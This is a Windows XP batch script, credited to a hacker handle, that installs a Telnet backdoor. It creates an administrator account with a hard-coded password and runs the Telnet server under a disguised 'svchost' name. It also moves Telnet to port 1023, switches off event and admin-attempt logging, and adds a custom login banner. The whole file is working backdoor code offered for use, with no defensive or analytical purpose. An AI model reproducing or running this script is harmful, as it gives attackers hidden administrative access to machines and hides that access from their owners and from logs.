
:: Telnet Backdoor for WindowsXP Ver 1.2 FiNAL
:: (C) heroin_AT_mol.mn http://protoculture.tk


:: ADD USER WITH SUFFiCENT RiGHTS!

net localgroup TelnetClients /add
net user iwam_user mypass /add
net localgroup Administratoren iwam_user /add
net localgroup TelnetClients iwam_user /add

:: SET DiENST!

CD /D %windir%\system32
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeÿ"
assoc .exeÿ=exefile
net stop tlntsvr
tlntsvr /unregserver
"svchost.exeÿ" /service

:: SET REGiSTRY!

ECHO Windows Registry Editor Version 5.00>tmp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>tmp.reg
ECHO "TelnetPort"=dword:000003ff>>tmp.reg
ECHO "EventLoggingEnabled"=dword:00000000>>tmp.reg
ECHO "LogAdminAttempts"=dword:00000000>>tmp.reg
regedit /s tmp.reg
DEL tmp.reg

:: SET LOGiN.CMD!

CD /D %windir%\system32
ECHO ECHO.>login.cmd
ECHO ECHO        *****************************************************************>>login.cmd
ECHO ECHO.>>login.cmd
ECHO ECHO                       WELCOME TO HEROIN`s TELNET SERVICE 1.2>>login.cmd
ECHO ECHO                heroin@mol.mn http://protoculture.tk 09.August 2004>>login.cmd
ECHO ECHO.>>login.cmd
ECHO ECHO        *****************************************************************>>login.cmd
ECHO CD \>>login.cmd
ECHO prompt %computername%:$P$G>>login.cmd

:: RUN iT!

net start tlntsvr
pause
